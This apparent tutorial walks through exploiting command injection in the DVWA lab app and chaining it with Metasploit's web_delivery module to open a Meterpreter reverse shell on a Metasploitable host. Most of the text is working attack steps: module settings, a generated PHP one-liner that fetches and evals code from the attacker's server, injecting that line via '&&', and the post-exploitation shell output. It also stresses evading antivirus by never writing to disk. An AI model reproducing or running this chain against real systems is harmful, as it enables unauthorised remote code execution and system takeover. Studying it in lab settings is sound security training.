One of the best ways to improve your skills as a hacker is to learn to combine different avenues of attack to achieve success. What if it were possible to get a victim to connect to our machine and execute a chosen payload on our behalf? This is indeed possible with the almighty Metasploit and the aid of a technique known as command injection.
Metasploit contains a useful module that hosts a payload on a server created on the attacking machine. The web delivery script is run once the target machine connects to the server and the payload is then executed. This module is versatile as it can target Python, Powershell, and PHP applications.
The web delivery scripts primary advantage is stealth. The server and payload are both hosted on the attacking machine, so when the exploit is carried out, there is nothing written to disk on the target, making it less likely to trigger antivirus applications and other defenses.
The one caveat of this exploit is that it needs a means of executing commands on the target to kick the script off. One possible method that is ideal for this situation is command injection.
Command injection is a type of attack in which arbitrary operating system commands are executed on the host via a vulnerable web application. Usually, this occurs when an application passes unsafe user input from a form to the server, but this can also happen with cookies, HTTP headers, and other sources of data.
This type of vulnerability is especially dangerous because of the intrinsic power of system commands. Depending on the level of privilege an application is running with, command injection can lead to an attacker owning an entire system.
The first thing we need to do is open DVWA and log in using the default credentials.
Next, browse to the "DVWA Security" tab and set the security level to "low" to make sure our exploit is run without any hiccups when we're ready.
Now we can navigate to the "Command Execution" page. For this attack to work, we have to ensure that the target application can communicate with our local machine. We can take advantage of the default functionality of this page to ping our attacking machine. Just enter the IP address and hit "submit."
After receiving a successful reply, the next thing we need to do is determine if this page is vulnerable to command injection. We can do so by appending an operating system command to the IP address we entered. Here, we will add the ls command with the && symbol and hit "submit" again.
We can see that the application responded with the contents of the current directory at the bottom, which means that a command injection vulnerability does indeed exist. We will take advantage of this to launch our web delivery script next.
Fire up Metasploit by typing msfconsole in the terminal. We can load the web delivery module with the following command.
msf > use exploit/multi/script/web_delivery
At the prompt, type options to display the current setting for this module.
msf exploit(multi/script/web_delivery) > options Module options (exploit/multi/script/web_delivery): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Payload options (python/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Python
We need to choose the appropriate target type, which, in this case, is PHP. Please note that for this module to work correctly, the target needs to be set before the payload is chosen. Type show targets to get a list of available options.
msf exploit(multi/script/web_delivery) > show targets Exploit targets: Id Name -- ---- 0 Python 1 PHP 2 PSH 3 Regsvr32 4 PSH (Binary)
Now we can set the rest of our options. Perform each command as shown below in order. For set target, it's an ID from the list above. The set payload is the payload we're using, in this case, php/meterpreter/reverse_tcp. For set lhost, it's the listening host address. And for set lport, it's our listening port.
msf exploit(multi/script/web_delivery) > set target 1 target => 1 msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf exploit(multi/script/web_delivery) > set lhost 172.16.1.100 lhost => 172.16.1.100 msf exploit(multi/script/web_delivery) > set lport 1234 lport => 1234
Finally, we are ready to launch the attack. Type run at the prompt to start the exploit. The server on our local machine will start. The last line provided by running the exploit, as seen below, is important because it shows the command that needs to be executed on the target system.
msf exploit(multi/script/web_delivery) > run [*] Exploit running as background job 0. [*] Started reverse TCP handler on 172.16.1.100:1234 [*] Using URL: http://0.0.0.0:8080/ko3Rb1zps9VTa [*] Local IP: http://172.16.1.100:8080/ko3Rb1zps9VTa [*] Server started. [*] Run the following command on the target machine: php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.1.100:8080/ko3Rb1zps9VTa'));"
We can use the command injection vulnerability that we discovered earlier as an easy means of attacking. So copy the last line and append it to the IP address with && in the "Command Execution" page in DVWA, just like we did earlier when seeing if the page was vulnerable in the first place.
If everything goes according to plan, once we hit "submit," our payload will execute and a Meterpreter session will be opened. Back in the terminal, we can see that this is exactly what happens.
msf exploit(multi/script/web_delivery) > [*] 172.16.1.102 web_delivery - Delivering Payload [*] Sending stage (37775 bytes) to 172.16.1.102 [*] Meterpreter session 1 opened (172.16.1.100:1234 -> 172.16.1.102:57343) at 2018-10-22 11:12:05 -0500
We are not automatically dropped into the session, though, so we can use the sessions command to view the active sessions that are open.
msf exploit(multi/script/web_delivery) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter php/linux www-data (33) @ metasploitable 172.16.1.100:1234 -> 172.16.1.102:57343 (172.16.1.102)
To interact with an active session, use the sessions -i command followed by the appropriate session ID number.
msf exploit(multi/script/web_delivery) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: www-data (33) meterpreter > sysinfo Computer : metasploitable OS : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 Meterpreter : php/linux
meterpreter > shell Process 4869 created. Channel 0 created. whoami www-data uname -a Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ps PID TTY TIME CMD 4656 ? 00:00:00 apache2 4658 ? 00:00:00 apache2 4661 ? 00:00:00 apache2 4663 ? 00:00:00 apache2 4665 ? 00:00:00 apache2 4761 ? 00:00:00 apache2 4793 ? 00:00:00 apache2 4855 ? 00:00:00 php 4856 ? 00:00:00 sh 4858 ? 00:00:00 php 4869 ? 00:00:00 sh 4873 ? 00:00:00 ps
From here, we can issue commands like whoami to view the current user, uname -a to display operating system information, and ps to see a list of running processes. By exploiting command injection in a vulnerable web application, we were able to execute our web delivery script and get a shell on the target without writing anything to disk.
In this tutorial, we learned a bit about command injection, Metasploit's web delivery script, and how to combine the two into an effective method of attack. Since this exploit avoids writing anything to disk, it increases the chances of success in evading antivirus solutions. In the world of security, there are often many creative ways to combine different techniques to achieve results, all you have to do is look.